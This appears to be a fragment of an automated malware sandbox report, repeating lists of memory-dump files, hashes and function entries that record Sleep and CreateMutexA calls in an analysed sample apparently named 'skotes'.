Associated: 00000001.00000002.1801093390.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801109401.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801129641.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801146718.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801163034.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801179569.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801196950.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801265616.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801284225.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801304743.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801325986.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801344149.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801370653.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801390333.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801410772.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801430143.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: c814ee2958398673fdc2fc002a4abcc46fe03d7b334d2ceb0ce65239aeb5586f
Instruction ID: e17757c8e2c95b94e8de466e9173e6a6f4bf7ae9bc893aa331972338385efd5c
Opcode Fuzzy Hash: c814ee2958398673fdc2fc002a4abcc46fe03d7b334d2ceb0ce65239aeb5586f
Instruction Fuzzy Hash: 60312A317002849BEB08ABBDDD897ADB7B2EFA6310F248718E014E73D5D77569C48752

Function 00AEA418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00AEA963
CreateMutexA.KERNELBASE(00000000,00000000,00B43254), ref: 00AEA981

Memory Dump Source

Source File: 00000001.00000002.1800363048.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.1800346707.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800363048.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800418860.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800435375.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800453191.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800550797.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800567785.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800587909.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800603980.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800653618.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800669786.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800686109.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800702543.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800718568.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800740314.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800756282.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800771785.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800788918.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800805984.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800826224.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800842513.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800858650.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800874264.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800890450.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800907571.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800923285.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800940503.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800955844.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800972349.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800992888.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801009999.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801027442.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801044455.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801061079.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801077619.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801093390.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801109401.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801129641.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801146718.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801163034.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801179569.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801196950.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801265616.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801284225.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801304743.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801325986.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801344149.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801370653.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801390333.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801410772.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801430143.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: b1b105b0c18210f26ddf0ddf249e2f5c8cfb4a673610ecf6d0a6d469ac7e4d36
Instruction ID: fa862b762c7d96608abcdd20b8e6878730c251d4e4d50b6072a76e9648c3f9ee
Opcode Fuzzy Hash: b1b105b0c18210f26ddf0ddf249e2f5c8cfb4a673610ecf6d0a6d469ac7e4d36
Instruction Fuzzy Hash: DE318E317002848BEB08ABBDDD89B6DB7A2EFA2314F244618E414DB3D5D7B569C48653

Function 00AEA54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00AEA963
CreateMutexA.KERNELBASE(00000000,00000000,00B43254), ref: 00AEA981

Memory Dump Source

Source File: 00000001.00000002.1800363048.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.1800346707.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800363048.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800418860.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800435375.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800453191.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800550797.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800567785.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800587909.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800603980.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800653618.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800669786.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800686109.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800702543.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800718568.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800740314.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800756282.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800771785.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800788918.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800805984.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800826224.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800842513.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800858650.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800874264.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800890450.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800907571.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800923285.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800940503.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800955844.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800972349.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800992888.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801009999.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801027442.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801044455.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801061079.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801077619.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801093390.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801109401.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801129641.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801146718.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801163034.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801179569.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801196950.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801265616.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801284225.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801304743.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801325986.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801344149.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801370653.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801390333.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801410772.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801430143.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 30cab322830cf99212d9badb47454d4654cb269a78062fece58cf8c617e7efb9
Instruction ID: d95d8ecf161b94481bf1c3a6789261ac3cd0f9e0a5adca1d6a3ed700d74db995
Opcode Fuzzy Hash: 30cab322830cf99212d9badb47454d4654cb269a78062fece58cf8c617e7efb9
Instruction Fuzzy Hash: 53314C317002848BEB08EBBDCDC576DB7A2EBD6314F248618E414DB3D6CB75A9808762

Function 00AEA682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00AEA963
CreateMutexA.KERNELBASE(00000000,00000000,00B43254), ref: 00AEA981

Memory Dump Source

Source File: 00000001.00000002.1800363048.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.1800346707.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800363048.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800418860.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800435375.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800453191.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800550797.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800567785.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800587909.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800603980.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800653618.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800669786.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800686109.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800702543.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800718568.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800740314.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800756282.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800771785.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800788918.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800805984.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800826224.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800842513.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800858650.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800874264.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800890450.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800907571.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800923285.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800940503.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800955844.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800972349.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800992888.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801009999.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801027442.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801044455.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801061079.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801077619.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801093390.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801109401.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801129641.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801146718.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801163034.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801179569.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801196950.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801265616.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801284225.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801304743.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801325986.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801344149.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801370653.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801390333.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801410772.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801430143.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 9d5b9f0c4ad2cb3d92b5f603b95045d4ac4a4fa70a6ae18264e1c3cae5719c9c
Instruction ID: 32f657da752b01bf8e386e8cce54277534c472f1f4e0c013c005538179f95259
Opcode Fuzzy Hash: 9d5b9f0c4ad2cb3d92b5f603b95045d4ac4a4fa70a6ae18264e1c3cae5719c9c
Instruction Fuzzy Hash: 9D3148317002848BEB18EB7DCD8976DB7B2EBA2310F248658E014DB3D6D7B5A9808652

Function 00AE9ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00AEA963
CreateMutexA.KERNELBASE(00000000,00000000,00B43254), ref: 00AEA981

Memory Dump Source

Source File: 00000001.00000002.1800363048.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.1800346707.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800363048.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800418860.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800435375.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800453191.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800550797.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800567785.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800587909.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800603980.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800653618.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800669786.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800686109.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800702543.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800718568.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800740314.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800756282.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800771785.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800788918.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800805984.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800826224.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800842513.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800858650.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800874264.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800890450.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800907571.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800923285.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800940503.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800955844.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800972349.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800992888.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801009999.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801027442.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801044455.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801061079.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801077619.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801093390.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801109401.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801129641.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801146718.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801163034.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801179569.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801196950.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801265616.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801284225.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801304743.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801325986.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801344149.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801370653.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801390333.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801410772.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801430143.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: f3b5c9aedb61ada1e21e2d6ef5a3a30c193e94648ca0a986a8a08f865c266639
Instruction ID: 7fc8d53959e03ce4f029d449ad976f1a2c2b868711c03523f9692b50f50ccaa0
Opcode Fuzzy Hash: f3b5c9aedb61ada1e21e2d6ef5a3a30c193e94648ca0a986a8a08f865c266639
Instruction Fuzzy Hash: D52149317043849BEB18AB6DEC8576DB7A2EBD2310F24461DF414C73D6DBB569848612

Function 00AEA856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00AEA963
CreateMutexA.KERNELBASE(00000000,00000000,00B43254), ref: 00AEA981

Memory Dump Source

Source File: 00000001.00000002.1800363048.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

